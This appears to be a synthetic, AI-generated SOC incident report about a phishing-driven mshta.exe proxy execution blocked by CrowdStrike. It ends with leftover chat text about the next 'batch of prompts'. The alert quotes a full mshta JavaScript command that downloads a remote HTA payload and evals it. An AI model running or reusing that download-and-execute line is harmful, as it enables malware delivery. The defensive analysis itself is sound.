CrowdStrike Alert Details
Alert ID: CS-Mshta-Proxy-1218-7842 Alert Time: 2024-03-09 10:30:22 EST Severity: HIGH (88/100) Source: CrowdStrike Falcon EDR Rule: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution” MITRE ATT&CK: T1218.005 – System Binary Proxy Execution: Mshta
Alert Details:
Detection: Mshta.exe (HTML Application host) executing script from remote URL
Host: DEV-WS-045 (Development Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 10:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
mshta.exe (PID: 4792)
Command: mshta.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload.hta”,false);h.Send();eval(h.responseText)
Detection Logic:
Mshta.exe executing JavaScript (unusual for this user)
Script downloads and executes HTA payload from remote URL
Parent process cmd.exe (unusual for mshta.exe)
Destination IP known malicious
Pattern matches mshta proxy execution (commonly used for malware)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed mshta.exe downloading remote script
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
HTA file contains PowerShell download cradle
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email; cmd.exe launched mshta
4. User Interview
Contact alexchen
Teams, Phone
User clicked “document” link; unaware
5. Immediate Action
Terminate mshta.exe
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-195 Summary: T1218.005 – Mshta Proxy Execution of Remote Payload Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, mshta, proxy-execution, crowdstrike, phishing Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution”.
Host: DEV-WS-045 (Development, user alexchen).
Process: mshta.exe with JavaScript downloading remote HTA.
Time: 2024-03-09 10:30 EST.
Technique: MITRE ATT&CK T1218.005 – System Binary Proxy Execution: Mshta.
2. Technical Analysis:
Attack Chain:
10:10 – User receives phishing email with link
10:12 – User clicks link (to malicious HTA)
10:13 – Browser downloads .hta file (or directly triggers mshta)
10:14 – cmd.exe launches mshta with JavaScript
10:15 – mshta downloads additional payload from 185.143.221[.]89
10:25 – CrowdStrike detects
Mshta Technique:
Mshta.exe is a legitimate Microsoft binary for running HTML Applications
Abuse: Can execute JavaScript/VBScript to download and run malware
Bypass: Often allowed by application whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload.hta
Content: HTA file with embedded PowerShell script
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Malware attempted to execute (blocked before full execution)
3. Investigation Findings:
Timeline:
10:10 – Email received
10:12 – Link clicked
10:14-10:15 – mshta execution
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated
10:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.hta
– IP: 185.143.221[.]89
Processes:
– mshta.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated mshta.exe.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Mshta allowed to execute scripts.
6. Business Impact:
Operational Impact: Development workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked mshta.exe from executing script content via AppLocker.
Enhanced URL filtering.
Created alert for mshta with command-line script.
8. Conclusion:
An attacker used mshta.exe to download and execute a malicious HTA payload, leveraging a trusted Windows binary. CrowdStrike detected the anomalous behavior and terminated the process before full compromise.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 11:30 EST
End of Batch 31
Ready for your next batch of prompts whenever you are.
Batch 32: Defense Evasion & Credential Access Incident Reports
Here are the next 5 detailed SOC incident reports.